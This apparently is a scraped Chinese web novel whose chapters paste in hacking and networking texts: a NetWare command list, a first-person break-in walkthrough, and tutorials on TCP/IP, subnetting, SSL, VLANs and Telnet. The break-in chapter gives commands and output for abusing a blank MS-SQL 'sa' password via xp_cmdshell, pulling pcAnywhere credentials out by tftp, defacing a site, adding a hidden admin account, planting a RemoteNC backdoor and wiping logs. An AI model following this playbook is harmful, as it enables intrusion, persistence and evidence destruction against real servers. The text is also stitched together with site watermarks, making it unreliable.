  它是用来指定一个程序在寻找一数据文件时如何使用搜索磁盘驱动器。
  27,SYSTIME
  它可用来查处在网络或多重网络上的FILESERVER的日期及时间。
  28,TLIST
  它可用来查看某目录可文件的受托者权限列表。
  29,USERDEF
  系统管理员可用它来完成下列工作:
  1,建立我重用户。
  2,提供简单的登录原稿。
  3,设置原始目录区。
  4,设置最小的登录/密码安全性。
  5,指定帐户及限制磁盘空间。
  6,设置打印工作选项。
  30,USERLIST
  1,查看一已知的FILESERVER当前用户列表。
  2,查看每一个用户的连接号码。
  3,查看登录时间。
  4,查看网络地址和节点地址。
  5,查看所连接的FILESERVER的类型。
  31,VERSION
  它是用来查看FILESERVER的版本及版权须知。
  32,VILINFO
  它可用来查看FILESERVER上每个卷的信息。
u优書萌 UuTXT。coM 铨纹字版越渎


第二卷 第四章 字数:3831
  ?先ping出目标主机的IP地址:
  连接IP主机:211.154.xxx.xx...
  发送56个字节...
  接收到56个字节!历时:0毫秒
  结论:IP主机正在与Internet连接中...
  接着选择打开扫描器x-way
  选择高级扫描功能。输入目标IP,开始扫描。数分钟后得到扫描结果如下(结果经整理):
  主机信息
  主机名:BEWDB01NOK
  80(HTTP)
  21(FTPControl)
  25(SMTP)
  443(HTTPS)
  1433(MSSQL)
  5631(PCAnyWhere)
  用户列表
  Administrator(Admin)Guesthacker(Admin)IUSR_BEWDB01NOKIWAM_BEWDB01NOKogilvyremoteuser(Admin)
  漏洞:
  /\../readme.txt(HTTP:200)
  /msadc/msadcs.dll(HTTP:200)
  /iisadmpwd/achg.htr(HTTP:200)
  /_AuthChangeUrl(HTTP:200)
  /?PageServices(HTTP:200)
  上一步中得到目标服务器的相关有用信息。可以发现扫描结果中并无可用的asp/cgi漏洞。而从所开端口来看,
  21(FTPControl)
  1433(MSSQL)
  5631(PCAnyWhere)
  只有这三个可用。在万一得已的情况下,我是不会用暴力破ftp的。那么只好从
  1433
  5631这两个端口入手了!我们知道,1433是ms-sql的服务端口,默认情况下它的最高权限用户帐号SA口令为空。如果管理员疏忽了这一点,没有给SA一个口令的话,事情就好办了!先来试试看。从www.tianxing.org下一个ms-sql的客户端,在Host框中输入目标ip:211.154.xxx.xx
  Username为sa
  password框空,连接:
  SQL>Connecting211.154.xxx.xx
  SQL>Connectedto211.154.xxx.xx
  呵呵!看来对方管理员没有对sa设置一个口令!太好了!可以在客户端以xp_cmdshell""的形式运行任意dos指令了!dir一下试试看:
  SQL>Command:xp_cmdshell"dirc:\"
  驱动器C中的卷没有卷标。
  卷的序列号是5CBD-664C
  卷的序列号是5CBD-664C
  c:\的目录
  c:\的目录
  01-12-2008:13p2u2u
  01-07-2308:10p0AUTOEXEC.BAT
  01-11-2804:02p84biaoti.txt
  01-07-2308:10p0CONFIG.SYS
  01-11-2211:49aInetPub
  01-10-2511:12a15
  360kkkk.XLS
  01-07-2412:09pMSSQL7
  01-12-1211:00a134
  217
  728pagefile.sys
  01-11-3010:59aProgramFiles
  01-09-0402:43p136sp_attach.sql
  01-12-2004:12ptemp
  01-09-2711:14aunzipped
  01-12-1512:09aWINNT
  13个文件134
  233
  308字节
  54
  232
  576字节可用
  54
  232
  576字节可用
  这时我们便可以改对方的主页了!前提是先找到对方的web目录!来找找看
  …………
  XX分钟后,满头大汉,乖乖!竟然有X个盘,每个盘下又有XX个目录,这样找下去得何年何月?不成!要是有windows界面的形式就好找的多了!想想看,目标主机还开着5631端口,这正是pcanywhere远程管理端口呀!取了它的管理帐号和密码不就得了吗?不错的想法,呵呵……
  默认情况下,pcanywhere安装于c:\ProgramFiles目录下,其data目录下的.cif文件中保存着加密过的连接帐号和密码。只要得到此文件,就可以用一个叫pcanywherepwd的软件快速解出密码!
  且看如何得到这个.cif文件。先用x-way的内置tftp服务器在本机建立tftp服务:
  选择“工具”菜单中的tftp服务器。设置一个默认根目录,点启动即可!
  然后再用ms-sql客户端在目标服务器执行如下指令:
  copyc:\progra~1\pcanywhere\data\NewCaller.CIFc:\winnt\system32
  tftp-i本地ipputNewCaller.CIF
  命令执行成功,这个cif文件已被传到本地tftp目录下了!
  此时,用pcanywherepwd.exe破解此文件,得到用户名为:administrator
  密码为:amsrepair
  打开pcanywheremanager建立一个指向211.154.xxx.xx的通道。在setting项中选择networkhostpctocontroloripadress
  并添上目标ip:211.154.xxx.xx
  选中logininformation项中的automaticallylogintohostupconnection
  并在下面的loginname和password栏中添入刚才得到的用户名和密码!确定即可。双击新建立的通道,稍等片刻即可看到了对方桌面。这下好搞了,呵呵~~在
  g:\home\wwweb\目录下,终于找到了他们的index.htm。删!再手动定一个简单的文件:
  hacked
  保存为:index.htm
  修改主页完成。
  该留个后门了,这是个NT主机,用小榕的RemoteNC做后门最好不过了!
  先给系统加个超级用户,用ms-sql来做:
  netuserwingwing/add
  netlocalgroupadministratorswing/add
  从对方桌面上打开ie连到小榕的站上下载RemoteNC,然后进入命令提示行状态
  键入:
  RemoteNC211.154.xxx.xxwingwingLocalSystem"RemoteNC""ProvideLocalCMDRedirect"7123456
  系统显示:
  [InstallServiceasRunasUserMode]
  Connecting211.154.xxx.xx.....Done.
  TransfferFile.....Done.
  StartService.....Done.
  NowYoucan211.154.xxx.xxtoConnect
  HaveaJoy安装成功
  这样在任何时候都可以telnet211.154.xxx.xx7输入密码:123456即可使用系统任何资源了!;)
  接下来该清理战场了,在ms-sql下停掉对方的ftp和www服务:
  netstopmsftpsvc
  netstopw3svc
  删除c:\winnt\system32\logfile下的所有文件。
  再将服务恢复:
  netstartmsftpsvc
  netstartw3svc
幽悠书盟 UuTXT。com 诠汶自板月渎


第二卷 第五章 字数:14315
  ?TCP/IP应该是个协议集,根据OS的七层理论,TCP/IP分为四层.分别是应用,传输,Interne和网络界面.
  我们一般说TCP在传输层,而IP在Internet层.
  TCP/IP的应用程序包括我们平时经常用到的Ping
  Telnet
  Ftp
  Finger等等
  配置TCP/IP包括IP地址,子网掩码和缺省网关
  正确检测TCP/IP的四个步骤:PIng127.0.0.1(回环地址)如果通表示TCP/IP已经装入,Ping自己表明客户机正常(主要是网卡),Ping网关表示局域网正常,Ping路由外地址表示完全正常,当然你也可以直接进行第四步,一般来说没这么麻烦的,但理论是基础:-)
  IP地址是四段八位的二进制数组成的,IP分为A
  B
  C
  D
  E五类地址
  A类高端为0
  从1.x.y.z~126.x.y.z.B类高端为10
  从128.x.y.z~191.x.y.zC类高端为110,从192.x.y.z~223.x.y.zD类高端为1110是保留的IP地址E类高端为1111,是科研用的IP地址
  其中255是广播地址,127是内部回送函数
  以下内容是子网的设定
  若公司不上Internet
  那一定不会烦恼IPAddress的问题
  因为可以任意使用所有的IPAddress
  不管是AClass或是BClass
  这个时候不会想到要用SubNet
  但若是上Internet那IPAddress便弥足珍贵了
  目前全球一阵Internet热
  IPAddress已经愈来愈少了
  而所申请的IPAddress目前也趋保守
  而且只有经申请的IPAddress能在Internet使用
  但对某些公司只能申请到一个CCLass的IPAddress
  但又有多个点需要使用
  那这时便需要使用到Subnet
  这篇短文说明Subnet的原理及如何规划。
  SubnetMask的介绍
  设定任何网路上的任何设备不管是主机、PC、Router等皆需要设定IPAddress
  而跟随著IPAddress的是所谓的NetMask
  这个NetMask主要的目的是由IPAddress中也能获得NetworkNumber
  也就是说IPAddress和NetMask作AND而得到NetworkNumber
  如下所示
  IPAddress192.10.10.611000000.00001010.00001010.00000110
  NetMask255.255.255.011111111.11111111.11111111.00000000
  AND-------------------------------------------------------------------
  etworkNumber192.10.10.011000000.00001010.00001010.00000000
  NetMask有所谓的预设值
  如下所示
  ClassIPAddress范围NetMask
  A1.0.0.0-126.255.255.255255.0.0.0
  B128.0.0.0-191.255.255.255255.255.0.0
  C192.0.0.0-223.255.255.255255.255.255.0
  在预设的NetMask都只有255的值
  在谈到SubnetMask时这个值便不一定是255了。
  在完整一组CClass中如203.67.10.0-203.67.10.255NetMask255.255.255.0
  203.67.10.0称之NetworkNumber(将IPAddress和Netmask作AND)
  而203.67.10.255是Broadcast的IPAddress
  所以这?两者皆不能使用
  实际只能使用203.67.10.1--203.67.10.254等254个IPAddress
  这是以255.255.255.0作NetMask的结果
  而所谓SubnetMsk尚可将整组CClass分成数组NetworkNumber
  这要在NEtMask作手脚
  若是要将整组CCLass分成2个NetworkNumber那NetMask设定为255.255.255.192
  若是要将整组CCLass分成8组NetworkNumber则NetMask要为255.255.255.224
  这是怎麽来的
  由以上知道NetworkNumber是由IPAddress和NetMask作AND而来的
  而且将NetMask以二进位表示法知道是1的会保留
  而为0的去掉
  192.10.10.193--11000000.00001010.00001010.10000001
  255.255.255.0--11111111.11111111.11111111.00000000
  --------------------------------------------------------------
  192.10.10.0--11000000.00001010.00001010.00000000
  以上是以255.255.255.0为NetMask的结果
  NetworkNumber是192.10.10.0
  若是使用255.255.255.224作NetMask结果便有所不同
  192.10.10.193--11000000.00001010.00001010.10000000
  255.255.255.224--11111111.11111111.11111111.11100000
  --------------------------------------------------------------
  192.10.10.192--11000000.00001010.00001010.10000000
  此时NetworkNumber变成了192.10.10.192
  这便是Subnet。
  那要如何决定所使用的NetMask
  255.255.255.224以二进位表示法为11111111.11111111.11111111.11100000
  变化是在最後一组
  11100000便是224
  以三个Bit可表示2的3次方便是8个NetworkNumber
  NetMask二进位表示法可分几个Network
  255.255.255.011111111.11111111.11111111.000000001
  255.255.255.12811111111.11111111.11111111.100000002
  255.255.255.19211111111.11111111.11111111.110000004
  255.255.255.22411111111.11111111.11111111.111000008
  255.255.255.24011111111.11111111.11111111.1111000016
  255.255.255.24811111111.11111111.11111111.1111100032
  255.255.255.25211111111.11111111.11111111.1111110064
  以下使用255.255.255.224将CClass203.67.10.0分成8组NetworkNumber
  各个NetworkNumber及其BroadcastIPAddress及可使用之IPAddress
  序号NetworkNumberBroadcast可使用之IPAddress
  1203.67.10.0203.67.10.31203.67.10.1-203.67.10.30
  2203.67.10.32203.67.10.63203.67.10.33-203.67.10.62
  3203.67.10.64203.67.10.95203.67.10.65-203.67.10.94
  4203.67.10.96203.67.10.127203.67.10.97-203.67.10.126
  5203.67.10.128203.67.10.159203.67.10.129-203.67.10.158
  6203.67.10.160203.67.10.191203.67.10.161-203.67.10.190
  7203.67.10.192203.67.10.223203.67.10.193-203.67.10.222
  8203.67.10.224203.67.10.255203.67.10.225-203.67.10.254
  可验证所使用的IPAddress是否如上表所示
  203.67.10.115--11001011.01000011.00001010.01110011
  255.255.255.224--11111111.11111111.11111111.11100000
  --------------------------------------------------------------
  203.67.10.96--11001011.01000011.00001010.01100000
  203.67.10.55--11001011.01000011.00001010.00110111
  255.255.255.224--11111111.11111111.11111111.11100000
  --------------------------------------------------------------
  203.67.10.32--11001011.01000011.00001010.00100000
  其他的NetMask所分成的NetworkNumber可自行以上述方法自行推演出来。
  Subnet的应用
  使用Subnet是要解决只有一组CClass但需要数个NetworkNumber的问题
  并不是解决IPAddress不够用的问题
  因为使用Subnet反而能使用的IPAddress会变少
  Subnet通常是使用在总公司在台北
  但分公司在台中
  两者之间使用Router连线
  同时也上Internet
  但只申请到一组CCLassIPAddress
  过Router又需不同的Network
  所以此时就必须使用到Subnet
  当然二办公司间可以RemoteBridge连接
  那便没有使用Subnet的问题
  这点在此不讨论
  所以在以上情况下的网路连线架构及IPAddress的使用
  TCP/IP(传输控制协议/网间协议)是一种网络通信协议,它规范了网络上的所有通信设备,尤其是一个主机与另一个主机之间的数据往来格式以及传送方式。TCP/IP是INTERNET的基础协议,也是一种电脑数据打包和寻址的标准方法。在数据传送中,可以形象地理解为有两个信封,TCP和IP就像是信封,要传递的信息被划分成若干段,每一段塞入一个TCP信封,并在该信封面上记录有分段号的信息,再将TCP信封塞入IP大信封,发送上网。在接受端,一个TCP软件包收集信封,抽出数据,按发送前的顺序还原,并加以校验,若发现差错,TCP将会要求重发。因此,TCP/IP在INTERNET中几乎可以无差错地传送数据。
  在任何一个物理网络中
  各站点都有一个机器可识别的地址
  该地址叫做物理地址.物理地址有两个
  特点:
  物理地址的长度
  格式等是物理网络技术的一部分
  物理网络不同
  物理地址也不同.
  同一类型不同网络上的站点可能拥有相同的物理地址.
  以上两点决定了
  不能用物理网络进行网间网通讯.
  在网络术语中,协议中,协议是为了在两台计算机之间交换数据而预先规定的标准。TCP/IP并不是一个而是许多协议,这就是为什么你经常听到它代表一个协议集的原因,而TCP和IP只是其中两个基本协议而已。
  你装在计算机-的TCP/IP软件提供了一个包括TCP、IP以及TCP/IP协议集中其它协议的工具平台。特别是它包括一些高层次的应用程序和FTP(文件传输协议),它允许用户在命令行上进行网络文件传输。
  TCP/IP是美国政府资助的高级研究计划署(ARPA)在二十世纪七十年代的一个研究成果,用来使全球的研究网络联在一起形成一个虚拟网络,也就是国际互联网。原始的
  Internet通过将已有的网络如ARPAnet转换到TCP/IP上来而形成,而这个Internet最终成为如今的国际互联网的骨干网。
  如今TCP/IP如此重要的原因,在于它允许独立的网格加入到Internet或组织在一起形成私有的内部网(Intranet)。构成内部网的每个网络通过一种-做路由器或IP路由器的设备在物理上联接在一起。路由器是一台用来从一个网络到另一个网络传输数据包的计算机。在一个使用TCP/IP的内部网中,信息通过使用一种独立的叫做IP包(IPpacket)或IP数据报(IPdatagrams)的数据单元进--传输。TCP/IP软件使得每台联到网络上的计算机同其它计算机“看”起来一模一样,事实上它隐藏了路由器和基本的网络体系结构并使其各方面看起来都像一个大网。如同联入以太网时需要确认一个48位的以太网地址一样,联入一个内部网也需要确认一个32位的IP地址。我们将它用带点的十进制数表示,如128.10.2.3。给定一个远程计算机的IP地址,在某个内部网或Internet上的本地计算机就可以像处在同一个物理网络中的两台计算机那样向远程计算机发送数据。
  TCP/IP提供了一个方案用来解决属于同一个内部网而分属不同物理网的两台计算机之间怎样交换数据的问题。这个方案包括许多部分,而TCP/IP协议集的每个成员则用来解决问题的某一部分。如TCP/IP协议集中最基本的协议-IP协议用来在内部网中交换数据并且执行一项重要的功能:路由选择--选择数据报从A主机到B主机将要经过的路径以及利用合适的路由器完成不同网络之间的跨越(hop)。
  TCP是一个更高层次的它允许运行在在不同主机上的应用程序相互交换数据流。TCP将数据流分成小段叫做TCP数据段(TCPsegments),并利用IP协议进行传输。在大多数情况下,每个TCP数据段装在一个IP数据报中进行发送。但如需要的话,TCP将把数据段分成多个数据报,而IP数据报则与同一网络不同主机间传输位流和字节流的物理数据帧相容。由于IP并不能保证接收的数据报的顺序相一致,TCP会在收信端装配TCP数据段并形成一个不间断的数据流。FTP和Telnet就是两个非常流行的依靠TCP的TCP/IP应用程序。
  另一个重要的TCP/IP协议集的成员是用户数据报协议(UDP),它同TCP相似但比TCP原始许多。TCP是一个可靠的协议,因为它有错误检查和握手确认来保证数据完整的到达目的地。UDP是一个“不可靠”的协议,因为它不能保证数据报的接收顺序同发送顺序相同,甚至不能保证它们是否全部到达。如果有可靠性要求,则应用程序避免使用它。同许多TCP/IP工具同时提供的SNMP(简单网络管理协议)就是一个使用UDP协议的应用例子。
  其它TCP/IP协议在TCP/IP网络中工作在幕后,但同样也发挥着重要作用。例如地址转换协议(ARP)将IP地址转换为物理网络地址如以太网地址。而与其对应的反向地址转换协议(RARP)做相反的工作,即将物理网络地址转换为IP地址。网际控制报文协议(ICMP)则是一个支持性协议,它利用IP完成IP数据报在传输时的控制信息和错误信息的传输。例如,如果一个路由器不能向前发送一个IP数据报,它就会利用ICMP来告诉发送者这里出现了问题。
  网络设计者在解决网络体系结构时经常使用ISO/OSI(国际标准化组织/开放系统互连)七层模型,该模型每一层代表一定层次的网络功能。最下面是物理层,它代表着进行数据转输的物理介质,换句话说,即网络电缆。其上是数据链路层,它通过网络接口卡提供服务。最上层是应用层,这里运行着使用网络服务的应用程序。
  TCP/IP是同ISO/OSI模型等价的。当一个数据单元从网络应用程序下流到网络接口卡,它通过了一列的TCP/IP模块。这其中的每一步,数据单元都会同网络另一端对等TCP/IP模块所需的信息一起打成包。这样当数据最终传到网卡时,它成了一个标准的以太帧(假设物理网络是以太网)。而接收端的TCP/IP软件通过剥去以太网帧并将数据向上传输过TCP/IP栈来为处于接收状态的应用程序重新恢复原始数据(一种最好的了解TCP/IP工作实质的方法,是使用探测程序来观察网络中的到处流动的帧中被不同TCP/IP模块所加上的信息)。
  为了勾勒TCP/IP在现实网络世界中所扮演的角色,请考虑当使用HTTP(超文本传输协议)的Web浏览器从连接在Internet上的Web服务器上获取一页HTML数据时所发生的情况。为形成同Web服务器的虚链路,浏览器使用一种被抽象地称为套接口(socket)的高层软件。为了获取Web页,它通过向套接口向套接口写入HTTPGET命令来向Web服务器发出该指令。接下来套接口软件使用TCP协议向Web服务器发出包含GET命令的字节流和位流,TCP将数据分段并将各独立段传到IP模块,该模块将数据段转换成数据报并发送给Web服务器。
  如果浏览器和服务器运--在不同物理网络的计算机上(一般情况如此),数据报从一个网络传到另一个网络,直到抵达服务器所在的那个网。最终,数据被传输到目的地址并被重新装配,这样Web服务器通过读自己的套接口来获得数据主干,并进而查看连续的数据流。对浏览器和服务器来说,数据在这一端写入套接口而在另一端出现如同魔术一般,但这只是底下发生的各种复杂的交互,它创造了数据经过网络无缝传输的假象。
  这就是TCP/IP所做的:将许多小网联成一个大网。并在这个大网也就是Internet上提供应用程序所需要的相互通信的服务。
  对于TCP/IP有许多可谈的,但这里仅讲三个关键点:
  ·TCP/IP是一族用来把不同的物理网络联在一起构成网际网的协议。TCP/IP联接独立的网络形成一个虚拟的网,在网内用来确认各种独立的不是物理网络地址,而是IP地址。
  ·TCP/IP使用多层体系结构,该结构清晰定义了每个协议的责任。TCP和UDP向网络应用程序提供了高层的数据传输服务,并都需要IP来传输数据包。IP有责任为数据包到达目的地选择合适的路由。
  ·在Internet主机上,两个运行着的应用程序之间传送要通过主机的TCP/IP堆栈上下移动。在发送端TCP/IP模块加在数据上的信息将在接收端对应的TCP/IP模块上滤掉,并将最终恢复原始数据。
  如果你有兴趣学习更多的TCP/IP知识,这里有两个较高层次的信息源RFC(RequestforComment)1180——叫做“TCP/IPTutorial”的文档,你可以从许多普及的RFC的Internet节点上下载。另一个是InternetworkingwithTCP/IP的第一卷:Principles,Protocols,andArchitectures,作者DouglasE.Comer(1995,Prentice-Hall)。作为该系三部曲中的第一部分,许多人把看成是一本TCP/IP圣经。
  在Internet应用编程序中,通常使用广义的进程间通信(IPC)机制来与不同层次的安全协议打交道。比较流行的两个IPC编程界面是BSDSockets和传输层界面(TLI),在Unix系统V命令里可以找到。
  在Internet中提供安全服务的首先一个想法便是强化它的IPC界面,如BSDSockets等,具体做法包括双端实体的认证,数据加密密钥的交换等。Netscape通信公司遵循了这个思路,制定了建立在可靠的传输服务(如TCP/IP所提供)基础上的安全套接层协议(SSL)。SSL版本3(SSLv3)于1995年12月制定。它主要包含以下两个协议:
  SSL记录协议它涉及应用程序提供的信息的分段、压缩、数据认证和加密。SSLv3提供对数据认证用的MD5和SHA以及数据加密用的R4和DES等的支持,用来对数据进行认证和加密的密钥可以通过SSL的握手协议来协商。
  SSL握手协议用来交换版本号、加密算法、(相互)身份认证并交换密钥。SSLv3提供对Deffie-Hellman密钥交换算法、基于RSA的密钥交换机制和另一种实现在Fortezzachip上的密钥交换机制的支持。
  Netscape通信公司已经向公众推出了SSL的参考实现(称为SSLref)。另一免费的SSL实现叫做SSLeay。SSLref和SSLeay均可给任何TCP/IP应用提供SSL功能。Internet号码分配当局(IANA)已经为具备SSL功能的应用分配了固定端口号,例如,带SSL的HTTP(https)被分配的端口号为443,带SSL的SMTP(ssmtp)被分配的端口号为465,带SSL的NNTP(snntp)被分配的端口号为563。
  微软推出了SSL2的改进版本称为PCT(私人通信技术)。至少从它使用的记录格式来看,SSL和PCT是十分相似的。它们的主要差别是它们在版本号字段的最显著位(TheMostSignificantBit)上的取值有所不同:SSL该位取0,PCT该位取1。这样区分之后,就可以对这两个协议都给以支持。1996年4月,IETF授权一个传输层安全(TLS)工作组着手制定一个传输层安全协议(TLSP),以便作为标准提案向IESG正式提交。TLSP将会在许多地方酷似SSL。
  前面已介绍Internet层安全机制的主要优点是它的透明性,即安全服务的提供不要求应用层做任何改变。这对传输层来说是做不到的。原则上,任何TCP/IP应用,只要应用传输层安全协议,比如说SSL或PCT,就必定要进行若干修改以增加相应的功能,并使用(稍微)不同的IPC界面。于是,传输层安全机制的主要缺点就是要对传输层IPC界面和应用程序两端都进行修改。可是,比起Internet层和应用层的安全机制来,这里的修改还是相当小的。另一个缺点是,基于UDP的通信很难在传输层建立起安全机制来。同网络层安全机制相比,传输层安全机制的主要优点是它提供基于进程对进程的(而不是主机对主机的)安全服务。这一成就如果再加上应用级的安全服务,就可以再向前跨越一大步了。
  三、应用层的安全性
  必须牢记(且须仔细品味):网络层(传输层)的安全协议允许为主机(进程)之间的数据通道增加安全属性。本质上,这意味着真正的(或许再加上机密的)数据通道还是建立在主机(或进程)之间,但却不可能区分在同一通道上传输的一个具体文件的安全性要求。比如说,如果一个主机与另一个主机之间建立起一条安全的IP通道,那么所有在这条通道上传输的IP包就都要自动地被加密。同样,如果一个进程和另一个进程之间通过传输层安全协议建立起了一条安全的数据通道,那么两个进程间传输的所有消息就都要自动地被加密。
  如果确实想要区分一个具体文件的不同的安全性要求,那就必须借助于应用层的安全性。提供应用层的安全服务实际上是最灵活的处理单个文件安全性的手段。例如一个电子邮件系统可能需要对要发出的信件的个别段落实施数据签名。较低层的协议提供的安全功能一般不会知道任何要发出的信件的段落结构,从而不可能知道该对哪一部分进行签名。只有应用层是唯一能够提供这种安全服务的层次。一般来说,在应用层提供安全服务有几种可能的做法,第一个想到的做法大概就是对每个应用(及应用协议)分别进行修改。一些重要的TCP/IP应用已经这样做了。在RFC1421至1424中,IETF规定了私用强化邮件(PEM)来为基于SMTP的电子邮件系统提供安全服务。由于种种理由,Internet业界采纳PEM的步子还是太慢,一个主要的原因是PEM依赖于一个既存的、完全可操作的PKI(公钥基础结构)。PEMPKI是按层次组织的,由下述三个层次构成:
  顶层为Internet安全政策登记机构(IPRA)
  次层为安全政策证书颁发机构(PCA)
  底层为证书颁发机构(CA)
  建立一个符合PEM规范的PKI也是一个政治性的过程,因为它需要多方在一个共同点上达成信任。不幸的是,历史表明,政治性的过程总是需要时间的,作为一个中间步骤,PhilZimmermann开发了一个软件包,叫做PGP(prettyGoodPrivacy)。PGP符合PEM的绝大多数规范,但不必要求PKI的存在。相反,它采用了分布式的信任模型,即由每个用户自己决定该信任哪些其他用户。因此,PGP不是去推广一个全局的PKI,而是让用户自己建立自己的信任之网。这就立刻产生一个问题,就是分布式的信任模型下,密钥废除了怎么办。
  S-HTTP是Web上使用的超文本传输协议(HTTP)的安全增强版本,由企业集成技术公司设计。S-HTTP提供了文件级的安全机制,因此每个文件都可以被设成私人/签字状态。用作加密及签名的算法可以由参与通信的收发双方协商。S-HTTP提供了对多种单向散列(Hash)函数的支持,如:MD2,MD5及SHA;对多种单钥体制的支持,如:DES,三元DES,RC2,RC4,以及CDMF;对数字签名体制的支持,如:RSA和DSS。
  目前还没有Web安全性的公认标准。这样的标准只能由WWWConsortium,IETF或其他有关的标准化组织来制定。而正式的标准化过程是漫长的,可能要拖上好几年,直到所有的标准化组织都充分认识到Web安全的重要性。S-HTTP和SSL是从不同角度提供Web的安全性的。S-HTTP对单个文件作"私人/签字"之区分,而SSL则把参与通信的相应进程之间的数据通道按"私用"和"已认证"进行监管。Terisa公司的SecureWeb工具软件包可以用来为任何Web应用提供安全功能。该工具软件包提供有RSA数据安全公司的加密算法库,并提供对SSL和S-HTTP的全面支持。
  另一个重要的应用是电子商务,尤其是信用卡交易。为使Internet上的信用卡交易安全起见,MasterCard公司(同IBM,Netscape,GTE和Cybercash一道)制定了安全电子付费协议(SEPP),Visa国际公司和微软(和其他一些公司一道)制定了安全交易技术(STT)协议。同时,MasterCard,Visa国际和微软已经同意联手推出Internet上的安全信用卡交易服务。他们发布了相应的安全电子交易(SET)协议,其中规定了信用卡持卡人用其信用卡通过Internet进行付费的方法。这套机制的后台有一个证书颁发的基础结构,提供对X.509证书的支持。
  上面提到的所有这些加安全功能的应用都会面临一个主要的问题,就是每个这样的应用都要单独进行相应的修改。因此,如果能有一个统一的修改手段,那就好多了。通往这个方向的一个步骤就是赫尔辛基大学的TatuYloenen开发的安全shell(SSH)。SSH允许其用户安全地登录到远程主机上,执行命令,传输文件。它实现了一个密钥交换协议,以及主机及客户端认证协议。SSH有当今流行的多种Unix系统平台上的免费版本,也有由DataFellows公司包装上市的商品化版本。
  把SSH的思路再往前推进一步,就到了认证和密钥分配系统。本质上,认证和密钥分配系统提供的是一个应用编程界面(API),它可以用来为任何网络应用程序提供安全服务,例如:认证、数据机密性和完整性、访问控制以及非否认服务。目前已经有一些实用的认证和密钥分配系统,如:MIT的Kerberos(V4与V5),IBM的CryptoKnight和NetwrokSecurityProgram,DEC的SPX,Karlsruhe大学的指数安全系统(TESS)等,都是得到广泛采用的实例。甚至可以见到对有些认证和密钥分配系统的修改和扩充。例如,SESAME和OSFDCE对KerberosV5作了增加访问控制服务的扩充,Yaksha对KerberosV5作了增加非否认服务的扩充。
  关于认证和密钥分配系统的一个经常遇到的问题是关于它们在Internet上所受到的冷遇。一个原因是它仍要求对应用本身做出改动。考虑到这一点,对一个认证和密钥分配系统来说,提供一个标准化的安全API就显得格外重要。能做到这一点,开发人员就不必再为增加很少的安全功能而对整个应用程序大动手术了。因此,认证系统设计领域内最主要的进展之一就是制定了标准化的安全API,即通用安全服务API(GSS-API)。GSS-API(v1及v2)对于一个非安全专家的编程人员来说可能仍显得过于技术化了些,但德州Austin大学的研究者们开发的安全网络编程(SNP),把界面做到了比GSS-API更高的层次,使同网络安全性有关的编程更加方便了。
  局域网在网络层有什么不安全的地方?
  NAI公司供稿
  不安全的地方
  由于局域网中采用广播方式,因此,若在某个广播域中可以侦听到所有的信息包,黑客就对可以对信息包进行分析,那么本广播域的信息传递都会暴露在黑客面前。
  网络分段
  网络分段是保证安全的一项重要措施,同时也是一项基本措施,其指导思想在于将非法用户与网络资源相互隔离,从而达到限制用户非法访问的目的。
  网络分段可分为物理分段和逻辑分段两种方式:
  物理分段通常是指将网络从物理层和数据链路层(ISO/OSI模型中的第一层和第二层)上分为若干网段,各网段相互之间无法进行直接通讯。目前,许多交换机都有一定的访问控制能力,可实现对网络的物理分段。逻辑分段则是指将整个系统在网络层(ISO/OSI模型中的第三层)上进行分段。例如,对于TCP/IP网络,可把网络分成若干IP子网,各子网间必须通过路由器、路由交换机、网关或防火墙等设备进行连接,利用这些中间设备(含软件、硬件)的安全机制来控制各子网间的访问。在实际应用过程中,通常采取物理分段与逻辑分段相结合的方法来实现对网络系统的安全性控制。
  VLAN的实现
  虚拟网技术主要基于近年发展的局域网交换技术(ATM和以太网交换)。交换技术将传统的基于广播的局域网技术发展为面向连接的技术。因此,网管系统有能力限制局域网通讯的范围而无需通过开销很大的路由器。
  以太网从本质上基于广播机制,但应用了交换器和VLAN技术后,实际上转变为点到点通讯,除非设置了监听口,信息交换也不会存在监听和插入(改变)问题。由以上运行机制带来的网络安全的好处是显而易见的:
  信息只到达应该到达的地点。因此、防止了大部分基于网络监听的入侵手段。
  通过虚拟网设置的访问控制,使在虚拟网外的网络节点不能直接访问虚拟网内节点。
  但是,虚拟网技术也带来了新的安全问题:
  执行虚拟网交换的设备越来越复杂,从而成为被攻击的对象。基于网络广播原理的入侵监控技术在高速交换网络内需要特殊的设置。基于MAC的VLAN不能防止MAC欺骗攻击。
  采用基于MAC的VLAN划分将面临假冒MAC地址的攻击。因此,VLAN的划分最好基于交换机端口。但这要求整个网络桌面使用交换端口或每个交换端口所在的网段机器均属于相同的VLAN。
  VLAN之间的划分原则
  VLAN的划分方式的目的是保证系统的安全性。因此,可以按照系统的安全性来划分VLAN;可以将总部中的服务器系统单独划作一个VLAN
  如数据库服务器、电子邮件服务器等。也可以按照机构的设置来划分VLAN,如将领导所在的网络单独作为一个LeaderVLAN(LVLAN)
  其他司局(或下级机构)分别作为一个VLAN
  并且控制LVLAN与其他VLAN之间的单向信息流向,即允许LVLAN查看其他VLAN的相关信息,其他VLAN不能访问LVLAN的信息。VLAN之内的连接采用交换实现,VLAN与VLAN之间采用路由实现。由于路由控制的能力有限,不能实现LVLAN与其他VLAN之间的单向信息流动,需要在LVLAN与其他VLAN之间设置一个Gauntlet防火墙作为安全隔离设备,控制VLAN与VLAN之间的信息交流
U优書擝 uuTXt.Com 诠蚊子坂月镀


第二卷 第六章 字数:3431
  ?除了在Telnet是如何工作的例子介绍的以外
  Telnet还有很多的特点。Telnet可发送除了"escape"的任何字符到远程主机上。因为"escape"字符在Telnet中是客户机的一个特殊的命令模式,它的默认值是"Ctrl-]"。但要注意不要与键盘上的Esc键混淆,我们可以设定"escape"为任意某个字符,只是对Telnet来说以为着该字符不可能再被传送到远程主机上,而Esc键是一非打印字符,Telnet用它来删除远程系统中的命令。而且还应记住,"escape"字符并不总以"Ctrl-]"来表示。
  可以仅仅键入Telnet
  后面不带机器字句。这种情况下所看到的是Telnet>
  这是告知Telnet在等待键入命令,比如键入问号"?"那么就得到一个有用的命令表:
  telnet:?
  Commandsmaybeabbreviated
  Commandare:
  openconnecttoasite
  closeclosecurrectconnection
  quitexittelnet
  displaydisplayoperatingparameters
  sendtransmitspecialcharacters('send?'formore)
  setsetoperatingparameters('set?'formore)
  statusprintstatusinformation
  toggletoggleoperatingparameters('toggle?'formore)
  modetrytoenterline-by-lineorcharacter-at-a-timemode
  ?printhelpinformation
  虽然命令很多,甚至还有子命令,但只有一些是常用的。现在介绍以下的几个:
  Close:
  该命令用语终止连接。它自动切断与远程系统的连接,也可以用它退出Telnet,在冒失的进入一个网络主机时,想退出的话,就可以用到这个命令。
  open:
